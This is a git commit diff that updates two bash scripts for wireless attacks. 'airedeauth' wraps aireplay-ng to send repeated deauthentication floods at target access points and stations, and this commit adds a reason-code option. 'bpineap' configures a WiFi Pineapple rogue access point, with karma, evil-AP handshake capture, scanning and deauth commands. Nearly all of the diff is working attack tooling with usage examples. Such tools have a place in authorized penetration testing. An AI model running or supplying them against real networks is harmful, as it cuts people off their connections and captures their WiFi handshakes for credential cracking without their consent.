Updated some scripts and added new ones

diff --git a/airedeauth b/airedeauth
--- a/airedeauth
+++ b/airedeauth
@@ -1,7 +1,7 @@
 #!/bin/bash
 
 show_help() {
-    echo "Usage: $0 [-i INTERFACE] [-a AP_BSSID] [-c CHANNEL] [-s STA_BSSID] [-t AP_BSSID_FILE] [-w WAIT] [-r REPEATS] [-n COUNT] [-x SPEED] [-h]"
+    echo "Usage: ${0} [-i INTERFACE] [-a AP_BSSID] [-c CHANNEL] [-s STA_BSSID] [-t AP_BSSID_FILE] [-w WAIT] [-r REPEATS] [-n COUNT] [-x SPEED] [-R REASON] [-h]"
     echo
     echo "Options:"
     echo "  -i INTERFACE    Specify the interface name to use."
@@ -9,10 +9,11 @@ show_help() {
     echo "  -c CHANNEL      Specify the channel number (mandatory if not using -t)."
     echo "  -s STA_BSSID    Specify the target STA BSSID (mandatory for single target if not using -t)."
     echo "  -t FILE         Specify the path to the file containing target AP BSSIDs and channels (one per line, format: BSSID,STATION,CHAN)."
-    echo "  -w WAIT         Specify the delay between runs in seconds (default: 60)."
-    echo "  -r REPEATS      Specify how many times the cycle should repeat (default: 3)."
-    echo "  -p COUNT        Specify the number of deauthentication packet groups to send per run (default: 1)."
+    echo "  -w WAIT         Specify the delay between runs in seconds (default: $DEFAULT_WAIT)."
+    echo "  -r REPEATS      Specify how many times the cycle should repeat (default: $DEFAULT_REPEATS)."
+    echo "  -p COUNT        Specify the number of deauthentication packet groups to send per run (default: $DEFAULT_COUNT)."
     echo "  -x SPEED        Specify the packet speed (default: unlimited)."
+    echo "  -R REASON       Specify the deauthentication reason code (default: $DEFAULT_REASON)."
     echo "  -h              Show this help menu."
     echo
     echo "Default Values:"
@@ -20,6 +21,18 @@ show_help() {
     echo "  REPEATS        $DEFAULT_REPEATS times"
     echo "  COUNT          $DEFAULT_COUNT packets"
     echo "  SPEED          $DEFAULT_SPEED packets/second"
+    echo "  REASON         $DEFAULT_REASON reason code."
+    echo
+    echo "Reason Codes:"
+    echo "  1 - Unspecified reason."
+    echo "  2 - Previous authentication no longer valid."
+    echo "  3 - Deauthenticated because sending station (STA) is leaving or has left Independent Basic Service Set (IBSS) or ESS."
+    echo "  4 - Disassociated due to inactivity."
+    echo "  5 - Disassociated because WAP device is unable to handle all currently associated STAs."
+    echo "  6 - Class 2 frame received from nonauthenticated STA."
+    echo "  7 - Class 3 frame received from nonassociated STA."
+    echo "  8 - Disassociated because sending STA is leaving or has left Basic Service Set."
+    echo "  9 - STA requesting (re)association is not authenticated with responding STA."
     echo
     echo "Target File Format for AP BSSID File:"
     echo
@@ -29,32 +42,33 @@ show_help() {
     echo "Examples:"
     echo
     echo "Single Target AP, Single Channel:"
-    echo "  $0 -i wlan1mon -a 00:11:22:33:44:55 -c 6"
+    echo "  ${0} -i wlan1mon -a 00:11:22:33:44:55 -c 6"
     echo
     echo "Single Target AP and Target STA, Single Channel:"
-    echo "  $0 -i wlan1mon -a 00:11:22:33:44:55 -s aa:bb:cc:dd:ee:ff -c 6"
+    echo "  ${0} -i wlan1mon -a 00:11:22:33:44:55 -s aa:bb:cc:dd:ee:ff -c 6"
     echo
     echo "AP BSSID File, With Optional Defaults:"
-    echo "  $0 -i wlan3mon -t targets.txt -w 30 -r 5"
+    echo "  ${0} -i wlan3mon -t targets.txt -w 30 -r 5"
     echo
 }
 
 cleanup() {
-    echo "Cleaning up..."
+    echo -e "\nCleaning up..."
     pkill -P $$  
     wait
-    echo "Cleanup complete. Exiting script."
+    echo "Done."
     exit 0
 }
 
-trap cleanup SIGINT
+trap cleanup SIGINT SIGTERM
 
 DEFAULT_WAIT=30
 DEFAULT_REPEATS=1
 DEFAULT_COUNT=1
 DEFAULT_SPEED=1
+DEFAULT_REASON=3
 
-while getopts ":i:a:c:s:t:w:r:p:x:h" opt; do
+while getopts ":i:a:c:s:t:w:r:p:x:R:h" opt; do
     case $opt in
         i) IFACE=$OPTARG ;;
         a) AP_BSSID=$OPTARG ;;
@@ -65,6 +79,7 @@ while getopts ":i:a:c:s:t:w:r:p:x:h" opt; do
         r) REPEATS=$OPTARG ;;
         p) COUNT=$OPTARG ;;
         x) SPEED=$OPTARG ;;
+        R) REASON=$OPTARG ;;
         h) show_help
            exit 0 ;;
         \?) echo "Invalid option: -$OPTARG" >&2
@@ -86,6 +101,7 @@ WAIT_SECONDS=${WAIT_SECONDS:-$DEFAULT_WAIT}
 REPEATS=${REPEATS:-$DEFAULT_REPEATS}
 COUNT=${COUNT:-$DEFAULT_COUNT}
 SPEED=${SPEED:-$DEFAULT_SPEED}
+REASON=${REASON:-$DEFAULT_REASON}
 
 # If not using a BSSID file, AP_BSSID is mandatory
 if [ -z "$AP_BSSID_FILE" ]; then
@@ -137,10 +153,11 @@ if [ -z "$AP_BSSID_FILE" ]; then
             echo "Target STA: ${STA_BSSID}"
             echo "Channel: ${CHANNEL}"
             echo "Interface: ${IFACE}"
-            echo "Deauthentication count: $COUNT"
-            echo "Packet speed: $SPEED packets/second"
+            echo "Deauthentication count: ${COUNT}"
+            echo "Packet speed: ${SPEED} packets/second"
             echo "Repeats: $((j+1))/${REPEATS}"
             echo "Wait time between attacks: ${WAIT_SECONDS}s"
+            echo "Reason Code: ${REASON}"
             echo "------------------------------"
             echo
             sleep 10
@@ -158,9 +175,9 @@ if [ -z "$AP_BSSID_FILE" ]; then
         iwconfig "${IFACE}" channel "${CHANNEL}"
         
         if [ -n "${STA_BSSID[$i]}" ]; then
-            aireplay-ng --deauth "$COUNT" -a "${BSSIDS[$i]}" -c "${STATION_BSSIDS[$i]}" -x "$SPEED" "${IFACE}"
+            aireplay-ng --deauth "${COUNT}" -a "${BSSIDS[$i]}" -c "${STATION_BSSIDS[$i]}" -x "${SPEED}" --deauth-rc "${REASON}" "${IFACE}"
         else
-            aireplay-ng --deauth "$COUNT" -a "${BSSIDS[$i]}" -x "$SPEED" "${IFACE}"
+            aireplay-ng --deauth "${COUNT}" -a "${BSSIDS[$i]}" -x "${SPEED}" --deauth-rc "${REASON}" "${IFACE}"
         fi
         echo
         echo "Stopped aireplay-ng instance."
@@ -188,10 +205,11 @@ if [ -n "$AP_BSSID_FILE" ]; then
                 echo
             done
             echo "Interface: ${IFACE}"
-            echo "Deauthentication count: $COUNT"
-            echo "Packet speed: $SPEED packets/second"
+            echo "Deauthentication count: ${COUNT}"
+            echo "Packet speed: ${SPEED} packets/second"
             echo "Repeats: $((j+1))/${REPEATS}"
             echo "Wait time between attacks: ${WAIT_SECONDS}s"
+            echo "Reason code: ${REASON}"
             echo "------------------------------"
             echo
             sleep 10
@@ -210,7 +228,7 @@ if [ -n "$AP_BSSID_FILE" ]; then
             # Set channel before running aireplay-ng command
             iwconfig "${IFACE}" channel "${CHANNELS[$i]}"
             
-            aireplay-ng --deauth "$COUNT" -a "${BSSIDS[$i]}" -c "${STATION_BSSIDS[$i]}" -x "$SPEED" "${IFACE}"
+            aireplay-ng --deauth "${COUNT}" -a "${BSSIDS[$i]}" -c "${STATION_BSSIDS[$i]}" -x "${SPEED}" --deauth-rc "${REASON}" "${IFACE}"
             echo
             echo "Stopped aireplay-ng instance."
             
diff --git a/bpineap b/bpineap
--- a/bpineap
+++ b/bpineap
@@ -1,53 +1,86 @@
 #!/bin/bash
 
+# Function for Help
+display_help() {
+    echo "Usage: ${0} <option> <value>"
+    echo -e "\nNOTICE: These changes made are not permanent in case of a error"
+    echo " a reboot will reset these changes. If you want to make them permanent"
+    echo " then use 'uci commit' this will commit ALL changes made!"
+    echo
+    echo -e "\nOptions:"
+    echo "  karma                      [on or off]"
+    echo "  beacon_interval            [LOW, NORMAL or AGGRESSIVE]"
+    echo "  beacon_response_interval   [LOW, NORMAL or AGGRESSIVE]"
+    echo "  beacon_responses           [on or off]"
+    echo "  broadcast_ssid_pool        [on or off]"
+    echo "  broadcast_ssid_pool_random [on or off]"
+    echo "  mac_filter                 [black or white]"
+    echo "  ssid_filter                [black or white]"
+    echo "  target_mac                 <MAC_ADDRESS>"
+    echo "  handshakes_path            <PATH>"
+    echo "  ssid_db_path               <PATH>"
+    echo "  filters_db_path            <PATH>"
+    echo "  connect_notifications      [on or off]"
+    echo "  disconnect_notifications   [on or off]"
+    echo "  auto_ssid_filter           [on or off]"
+    echo "  auto_mac_filter            [on or off]"
+    echo "  pineape_passthrough        [on or off]"
+    echo "  hostapd_db_path            <PATH>"
+    echo "  recon_db_path              <PATH>"
+    echo "  pineap_mac                 <MAC_ADDRESS>"
+    echo "  evil_ap_handshakes         [on or off]"
+    echo "  capture_ssids              [on or off]"
+    echo "  logging                    [on or off]"
+    echo "  autostart                  [on or off]"
+    echo "  pineap_interface           [wlan1mon or wlan3mon]"
+    echo "  run_scan [duration sec (0 = Continuous)] [Band: 0,1,2 (2.4GHz,5GHz,Both)] [capture handshakes: 0,1 (off,on)]"
+    echo "  show_scan                  (Show current running scan, if any)"
+    echo "  stop_scan                  (Stop current running scan, if any)"
+    echo "  show_config                (Show curent uci config)"
+    echo "  clear_logs                 (Clears activity log [log.db])"
+    echo "  start_handshake_capture    [bssid] [channel]"
+    echo "  stop_handshake_capture     (Stop current handshake capture, if any)"
+    echo "  deauth                     [AP MAC] [Client MAC] [Channel] [Count]"
+}
+
+# Function to restart pineapd
+restart_pineapd() {
+    /etc/init.d/pineapd restart
+    echo "Pineapd restarted waiting a few seconds.."
+    sleep 5
+}
+
+# Function to prompt user to stop scan
+prompt_stop_scan() {
+    read -e -p "A scan is already running. Would you like to stop it and continue? (Y/N): " choice
+    case "$choice" in
+        [yY])
+            pineap stop_scan
+            pineap handshake_capture_stop
+            echo "The running scan has been stopped."
+            ;;
+        [nN])
+            echo "Use ${0} show_scan to check the status."
+            echo "Current scan not stopped. Exiting..."
+            exit 1
+            ;;
+        *)
+            echo "Invalid choice. Exiting..."
+            exit 1
+            ;;
+    esac
+}
+
 case $1 in
     help)
-        echo "Usage: $0 <option> <value>"
-        echo -e "\nNOTICE: These changes made are not permanent in case of a error"
-        echo " a reboot will reset these changes. If you want to make them permanent"
-        echo " then use 'uci commit' this will commit ALL changes made!"
-        echo
-        echo -e "\nOptions:"
-        echo "  karma                      [on or off]"
-        echo "  beacon_interval            [LOW, NORMAL or AGGRESSIVE]"
-        echo "  beacon_response_interval   [LOW, NORMAL or AGGRESSIVE]"
-        echo "  beacon_responses           [on or off]"
-        echo "  broadcast_ssid_pool        [on or off]"
-        echo "  broadcast_ssid_pool_random [on or off]"
-        echo "  mac_filter                 [black or white]"
-        echo "  ssid_filter                [black or white]"
-        echo "  target_mac                 <MAC_ADDRESS>"
-        echo "  handshakes_path            <PATH>"
-        echo "  ssid_db_path               <PATH>"
-        echo "  filters_db_path            <PATH>"
-        echo "  connect_notifications      [on or off]"
-        echo "  disconnect_notifications   [on or off]"
-        echo "  auto_ssid_filter           [on or off]"
-        echo "  auto_mac_filter            [on or off]"
-        echo "  pineape_passthrough        [on or off]"
-        echo "  hostapd_db_path            <PATH>"
-        echo "  recon_db_path              <PATH>"
-        echo "  pineap_mac                 <MAC_ADDRESS>"
-        echo "  evil_ap_handshakes         [on or off]"
-        echo "  capture_ssids              [on or off]"
-        echo "  logging                    [on or off]"
-        echo "  autostart                  [on or off]"
-        echo "  pineap_interface           [wlan1mon or wlan3mon]"
-        echo "  run_scan [duration sec (0 = Continuous)] [Band: 0,1,2 (2.4GHz,5GHz,Both)] [capture handshakes: 0,1 (off,on)]"
-        echo "  show_scan                  (Show current running scan, if any)"
-        echo "  stop_scan                  (Stop current running scan, if any)"
-        echo "  show_config                (Show curent uci config)"
-        echo "  clear_logs                 (Clears activity log [log.db])"
-        echo "  start_handshake_capture    [bssid] [channel]"
-        echo "  stop_handshake_capture     (Stop current handshake capture, if any)"
-        echo "  deauth                     [AP MAC] [Client MAC] [Channel] [Count]"
+        display_help
         ;;
 
     karma)
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].karma="$2"
             echo "Karma updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Karma. Use 'on' or 'off'."
         fi
@@ -57,7 +90,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].beacon_interval="$2"
             echo "Beacon Interval updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Beacon Interval. Please provide a valid value."
         fi
@@ -67,7 +100,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].beacon_response_interval="$2"
             echo "Beacon Response Interval updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Beacon Response Interval. Please provide a valid value."
         fi
@@ -77,7 +110,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].beacon_responses="$2"
             echo "Beacon Responses updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Beacon Responses. Use 'on' or 'off'."
         fi
@@ -87,7 +120,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].broadcast_ssid_pool="$2"
             echo "Broadcast SSID Pool updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Broadcast SSID Pool. Use 'on' or 'off'."
         fi
@@ -97,7 +130,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].broadcast_ssid_pool_random="$2"
             echo "Broadcast SSID Pool Random updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Broadcast SSID Pool Random. Use 'on' or 'off'."
         fi
@@ -107,7 +140,7 @@ case $1 in
         if [ "$2" == "black" ] || [ "$2" == "white" ]; then
             uci set pineap.@config[0].mac_filter="$2"
             echo "MAC Filter updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for MAC Filter. Use 'black' or 'white'."
         fi
@@ -117,7 +150,7 @@ case $1 in
         if [ "$2" == "black" ] || [ "$2" == "white" ]; then
             uci set pineap.@config[0].ssid_filter="$2"
             echo "SSID Filter updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for SSID Filter. Use 'black' or 'white'."
         fi
@@ -127,7 +160,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].target_mac="$2"
             echo "Target MAC updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Target MAC. Please provide a valid MAC address."
         fi
@@ -137,7 +170,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].handshakes_path="$2"
             echo "Handshakes Path updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Handshakes Path. Please provide a valid path."
         fi
@@ -147,7 +180,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].ssid_db_path="$2"
             echo "SSID DB Path updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for SSID DB Path. Please provide a valid path."
         fi
@@ -157,7 +190,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].filters_db_path="$2"
             echo "Filters DB Path updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Filters DB Path. Please provide a valid path."
         fi
@@ -167,7 +200,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].connect_notifications="$2"
             echo "Connect Notifications updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Connect Notifications. Use 'on' or 'off'."
         fi
@@ -177,7 +210,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].disconnect_notifications="$2"
             echo "Disconnect Notifications updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Disconnect Notifications. Use 'on' or 'off'."
         fi
@@ -187,7 +220,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].auto_ssid_filter="$2"
             echo "Auto SSID Filter updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Auto SSID Filter. Use 'on' or 'off'."
         fi
@@ -197,7 +230,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].auto_mac_filter="$2"
             echo "Auto MAC Filter updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Auto MAC Filter. Use 'on' or 'off'."
         fi
@@ -207,7 +240,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].pineape_passthrough="$2"
             echo "PineAPe Passthrough updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for PineAPe Passthrough. Use 'on' or 'off'."
         fi
@@ -217,7 +250,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].hostapd_db_path="$2"
             echo "HostAPD DB Path updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for HostAPD DB Path. Please provide a valid path."
         fi
@@ -227,7 +260,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].recon_db_path="$2"
             echo "Recon DB Path updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Recon DB Path. Please provide a valid path."
         fi
@@ -237,7 +270,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].pineap_mac="$2"
             echo "PineAP MAC updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for PineAP MAC. Please provide a valid MAC address."
         fi
@@ -247,7 +280,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].evil_ap_handshakes="$2"
             echo "Evil AP Handshakes updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Evil AP Handshakes. Use 'on' or 'off'."
         fi
@@ -257,7 +290,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].capture_ssids="$2"
             echo "Capture SSIDs updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Capture SSIDs. Use 'on' or 'off'."
         fi
@@ -267,7 +300,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].logging="$2"
             echo "Logging updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Logging. Use 'on' or 'off'."
         fi
@@ -277,7 +310,7 @@ case $1 in
         if [ "$2" == "on" ] || [ "$2" == "off" ]; then
             uci set pineap.@config[0].autostart="$2"
             echo "Autostart updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for Autostart. Use 'on' or 'off'."
         fi
@@ -287,7 +320,7 @@ case $1 in
         if [ -n "$2" ]; then
             uci set pineap.@config[0].pineap_interface="$2"
             echo "PineAP Interface updated successfully."
-            /etc/init.d/pineapd restart
+            restart_pineapd
         else
             echo "Invalid value for PineAP Interface. Please provide a valid interface."
         fi
@@ -302,10 +335,12 @@ case $1 in
     run_scan)
         if [ $# -eq 4 ]; then
             # Check if a scan is already running
-            scan_status=$(pineap get_status | grep '"scanRunning": false')
-            
-            if [ -z "$scan_status" ]; then
-                echo "A scan is already running. Use 'pineap get_status' to check the status."
+            scan_status=$(pineap get_status)
+        
+            if [[ $scan_status =~ "\"bssid\":" && $scan_status =~ "\"captureRunning\": true" && $scan_status =~ "\"scanRunning\": false" ]]; then
+                prompt_stop_scan
+            elif [[ $scan_status =~ "\"scanRunning\": true" ]]; then
+                prompt_stop_scan
             else
                 duration="$2"
                 band_choice="$3"
@@ -348,7 +383,7 @@ case $1 in
                 fi
             fi
         else
-            echo "Invalid number of arguments. Usage: $0 scan <duration> <frequency_band> <autocapture>"
+            echo "Invalid number of arguments. Usage: ${0} scan <duration> <frequency_band> <autocapture>"
         fi
         ;;
 
@@ -420,7 +455,7 @@ case $1 in
 
     *)
         # Display help menu if no arguments provided
-        echo "Usage: $0 <option> <value>"
-        echo "Use '$0 help' to see the available options and usage."
+        echo "Usage: ${0} <option> <value>"
+        echo "Use ${0} help to see the available options and usage."
         ;;
 esac
